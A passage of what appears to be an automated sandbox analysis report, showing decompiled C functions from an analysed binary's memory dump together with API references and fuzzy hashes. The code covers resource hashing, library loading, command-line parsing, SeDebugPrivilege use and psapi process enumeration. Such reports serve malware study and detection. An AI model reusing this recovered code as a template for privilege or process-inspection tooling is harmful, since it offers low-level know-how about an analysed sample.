                                                                                                                                                                                                                          					_t9 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                                                                                                                          					if(_t9 != 0) {
                                                                                                                                                                                                                          						 *0x41c8e8 = 1;
                                                                                                                                                                                                                          						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if( *0x41c8ec == 0) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
                                                                                                                                                                                                                          					return _t8;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                                                                          • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                                                                          • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                                                                                                                          				struct HRSRC__* _t12;
                                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                          				signed int _t18;
                                                                                                                                                                                                                          				signed int _t26;
                                                                                                                                                                                                                          				signed int _t29;
                                                                                                                                                                                                                          				signed int _t33;
                                                                                                                                                                                                                          				struct HRSRC__* _t35;
                                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t12 = FindResourceW(_a4, _a12, _a8); // executed
                                                                                                                                                                                                                          				_t35 = _t12;
                                                                                                                                                                                                                          				if(_t35 != 0) {
                                                                                                                                                                                                                          					_t33 = SizeofResource(_a4, _t35);
                                                                                                                                                                                                                          					if(_t33 > 0) {
                                                                                                                                                                                                                          						_t16 = LoadResource(_a4, _t35);
                                                                                                                                                                                                                          						if(_t16 != 0) {
                                                                                                                                                                                                                          							_t17 = LockResource(_t16);
                                                                                                                                                                                                                          							if(_t17 != 0) {
                                                                                                                                                                                                                          								_a4 = _t33;
                                                                                                                                                                                                                          								_t29 = _t33 * _t33;
                                                                                                                                                                                                                          								_t36 = 0;
                                                                                                                                                                                                                          								_t7 =  &_a4;
                                                                                                                                                                                                                          								 *_t7 = _a4 >> 2;
                                                                                                                                                                                                                          								if( *_t7 != 0) {
                                                                                                                                                                                                                          									do {
                                                                                                                                                                                                                          										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
                                                                                                                                                                                                                          										_t36 = _t36 + 1;
                                                                                                                                                                                                                          										_t29 = _t26;
                                                                                                                                                                                                                          									} while (_t36 < _a4);
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								_t18 =  *0x40fa70; // 0xfcb617dc
                                                                                                                                                                                                                          								 *0x40fa70 = _t18 + _t29 ^ _t33;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                                          • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                                                                                                                          • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                                          				void** _t21;
                                                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t21 = __edi;
                                                                                                                                                                                                                          				_t22 =  *__eax;
                                                                                                                                                                                                                          				if(__edx < _t22) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t13 =  *__edi;
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_t1 =  &_a8; // 0x4057e1
                                                                                                                                                                                                                          						 *__eax =  *__eax +  *_t1;
                                                                                                                                                                                                                          						_t16 =  *__eax;
                                                                                                                                                                                                                          					} while (__edx >= _t16);
                                                                                                                                                                                                                          					_t8 = malloc(_t16 * _a4); // executed
                                                                                                                                                                                                                          					 *__edi = _t8;
                                                                                                                                                                                                                          					if(_t22 > 0) {
                                                                                                                                                                                                                          						if(_t8 != 0) {
                                                                                                                                                                                                                          							memcpy(_t8, _t13, _t22 * _a4);
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						free(_t13); // executed
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return 0 |  *_t21 != 0x00000000;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • malloc.MSVCRT ref: 0040496D
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00404985
                                                                                                                                                                                                                          • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                                                                                                                          • String ID: W@
                                                                                                                                                                                                                          • API String ID: 3056473165-1729568415
                                                                                                                                                                                                                          • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                                                                          • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00405436(wchar_t* _a4) {
                                                                                                                                                                                                                          				void _v2050;
                                                                                                                                                                                                                          				signed short _v2052;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t16;
                                                                                                                                                                                                                          				WCHAR* _t18;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v2052 = _v2052 & 0x00000000;
                                                                                                                                                                                                                          				memset( &_v2050, 0, 0x7fe);
                                                                                                                                                                                                                          				E00404C3C( &_v2052);
                                                                                                                                                                                                                          				_t18 =  &_v2052;
                                                                                                                                                                                                                          				E004047AF(_t18);
                                                                                                                                                                                                                          				wcscat(_t18, _a4);
                                                                                                                                                                                                                          				_t16 = LoadLibraryW(_t18); // executed
                                                                                                                                                                                                                          				if(_t16 == 0) {
                                                                                                                                                                                                                          					return LoadLibraryW(_a4);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t16;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405456
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                                                                            • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                                                                            • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                                                                                                                            • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00405478
                                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3725422290-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                          				signed short* _v28;
                                                                                                                                                                                                                          				signed int _v32;
                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                                          				signed int _v48;
                                                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				signed short* _t68;
                                                                                                                                                                                                                          				signed short _t72;
                                                                                                                                                                                                                          				intOrPtr _t80;
                                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                                          				void* _t85;
                                                                                                                                                                                                                          				intOrPtr _t90;
                                                                                                                                                                                                                          				signed int _t101;
                                                                                                                                                                                                                          				intOrPtr _t102;
                                                                                                                                                                                                                          				void** _t104;
                                                                                                                                                                                                                          				signed short* _t106;
                                                                                                                                                                                                                          				signed int* _t107;
                                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t94 = __ecx;
                                                                                                                                                                                                                          				_t101 = 0;
                                                                                                                                                                                                                          				_v32 = 0x22;
                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                          				_v24 = 1;
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				_v48 = 0;
                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                          				_v40 = 0x100;
                                                                                                                                                                                                                          				_v52 = 0;
                                                                                                                                                                                                                          				_t68 = E004054B9(_a4);
                                                                                                                                                                                                                          				_t106 = _a8;
                                                                                                                                                                                                                          				if( *_t106 == 0) {
                                                                                                                                                                                                                          					L31:
                                                                                                                                                                                                                          					_t107 = _a4;
                                                                                                                                                                                                                          					L32:
                                                                                                                                                                                                                          					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
                                                                                                                                                                                                                          					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
                                                                                                                                                                                                                          					E004055D1(_t68,  &_v52);
                                                                                                                                                                                                                          					return _t102;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v28 = _t106;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_t72 =  *_v28 & 0x0000ffff;
                                                                                                                                                                                                                          					if(_t72 != 0x20 || _v8 != 0) {
                                                                                                                                                                                                                          						if(_t72 == 0x22 || _t72 == 0x27) {
                                                                                                                                                                                                                          							if(_v8 != 0) {
                                                                                                                                                                                                                          								if(_t72 != _v32) {
                                                                                                                                                                                                                          									goto L14;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								_v8 = _v8 ^ 0x00000001;
                                                                                                                                                                                                                          								goto L25;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_v32 = _t72 & 0x0000ffff;
                                                                                                                                                                                                                          							_v8 = 1;
                                                                                                                                                                                                                          							goto L25;
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							L14:
                                                                                                                                                                                                                          							if(_t101 != 0) {
                                                                                                                                                                                                                          								L24:
                                                                                                                                                                                                                          								E0040559A( &_v52, _t101);
                                                                                                                                                                                                                          								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
                                                                                                                                                                                                                          								_t106 = _a8;
                                                                                                                                                                                                                          								_t101 = _t101 + 1;
                                                                                                                                                                                                                          								_v12 = _t101;
                                                                                                                                                                                                                          								L25:
                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                          								goto L26;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							if(_t72 == 0x20) {
                                                                                                                                                                                                                          								goto L25;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_t104 = _a4 + 0x20;
                                                                                                                                                                                                                          							if(_v16 >= 0) {
                                                                                                                                                                                                                          								_t110 = _v16;
                                                                                                                                                                                                                          								_t82 = _t104[2];
                                                                                                                                                                                                                          								if(_t110 != 0xffffffff) {
                                                                                                                                                                                                                          									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                          									free( *_t104);
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								_t85 = _t110 + 1;
                                                                                                                                                                                                                          								if(_t104[3] < _t85) {
                                                                                                                                                                                                                          									_t104[3] = _t85;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								_t94 = _v20;
                                                                                                                                                                                                                          								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							_t101 = _v12;
                                                                                                                                                                                                                          							goto L24;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						if(_v24 == 0) {
                                                                                                                                                                                                                          							E0040559A( &_v52, _t101);
                                                                                                                                                                                                                          							_t90 = _v36;
                                                                                                                                                                                                                          							 *((short*)(_t90 + _t101 * 2)) = 0;
                                                                                                                                                                                                                          							if(_t90 == 0) {
                                                                                                                                                                                                                          								_t90 = 0x40c4e8;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							E004054DF(_a4, _t94, _t90); // executed
                                                                                                                                                                                                                          							_v16 = _v16 + 1;
                                                                                                                                                                                                                          							_v24 = 1;
                                                                                                                                                                                                                          							_v12 = 0;
                                                                                                                                                                                                                          							_t101 = 0;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					L26:
                                                                                                                                                                                                                          					_v20 = _v20 + 1;
                                                                                                                                                                                                                          					_t68 = _t106 + _v20 * 2;
                                                                                                                                                                                                                          					_v28 = _t68;
                                                                                                                                                                                                                          				} while ( *_t68 != 0);
                                                                                                                                                                                                                          				if(_t101 <= 0) {
                                                                                                                                                                                                                          					goto L31;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E0040559A( &_v52, _t101);
                                                                                                                                                                                                                          				_t80 = _v36;
                                                                                                                                                                                                                          				 *((short*)(_t80 + _t101 * 2)) = 0;
                                                                                                                                                                                                                          				if(_t80 == 0) {
                                                                                                                                                                                                                          					_t80 = 0x40c4e8;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t107 = _a4;
                                                                                                                                                                                                                          				_t68 = E004054DF(_t107, _t94, _t80);
                                                                                                                                                                                                                          				goto L32;
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 004054B9: free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                                                                                                                            • Part of subcall function 004054B9: free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                                                                                                                            • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                                                                                                                          • free.MSVCRT(?,00000000,?,00000000), ref: 004057A5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                          • API String ID: 1294909896-123907689
                                                                                                                                                                                                                          • Opcode ID: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                                                                                                                          • Instruction ID: 1409d80bf75a77decaa3a1a55a0e2bac06d52b88a1a49f7bf6fe6aa810a6aee9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3eeb61968f5ac6cc7ddf255b1d7beaa2342315e0b6fe90f5a0d6307f80e1fc2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F511675D00619EBCB20EF99C8805AEB7B5FF44314F50807BE945B7290D738AA42DF99
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004054B9(intOrPtr* __esi) {
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				free( *(__esi + 0x10));
                                                                                                                                                                                                                          				free( *(__esi + 0xc)); // executed
                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi + 4)) = 0;
                                                                                                                                                                                                                          				 *(__esi + 0xc) = 0;
                                                                                                                                                                                                                          				 *(__esi + 0x10) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi + 0x1c)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(__esi + 8)) = 0;
                                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                                          			}




                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • free.MSVCRT(?,004056F7,00000000,?,00000000), ref: 004054BC
                                                                                                                                                                                                                          • free.MSVCRT(?,?,004056F7,00000000,?,00000000), ref: 004054C4
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                          • Opcode ID: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                                                                                                                          • Instruction ID: 7665469e3ee5729aacaba78e143212aa4928b7d925741869fd88885e7d369011
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46b26eb0f7634a7a859f62a4155f99fc61a4d37ba6de741af70d04cb62256736
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2D0A2B1515B018ED7B5DF39E405506BBF1EF083143108D7E90AED2A51E735A5549F48
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                          				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
                                                                                                                                                                                                                          				_t13 = _t8;
                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                          					FreeLibrary(_v8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _t13;
                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                                                                            • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 187924719-0
                                                                                                                                                                                                                          • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                                                                                                                          • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                                          			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				intOrPtr* _t6;
                                                                                                                                                                                                                          				void* _t8;
                                                                                                                                                                                                                          				struct HINSTANCE__** _t10;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t10 = __eax;
                                                                                                                                                                                                                          				E00409921(__eax);
                                                                                                                                                                                                                          				_t6 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                                                                                                                                                          				if(_t6 == 0) {
                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
                                                                                                                                                                                                                          				return _t8;
                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                                                                                                                            • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859505661-0
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E004095DA(signed int* __edi) {
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				struct HINSTANCE__* _t3;
                                                                                                                                                                                                                          				signed int* _t7;
                                                                                                                                                                                                                          
